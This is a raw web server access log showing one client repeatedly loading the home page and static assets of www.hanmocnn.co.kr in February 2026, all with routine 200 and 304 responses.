"https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:45:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:45:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:45:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9734] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:46:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9737] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:49:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:50:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9737] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:50:26 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:50:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:50:26 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:57:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9730] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:58:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9740] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:23:59:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:03:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:03:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:03:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:03:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9733] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:06:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 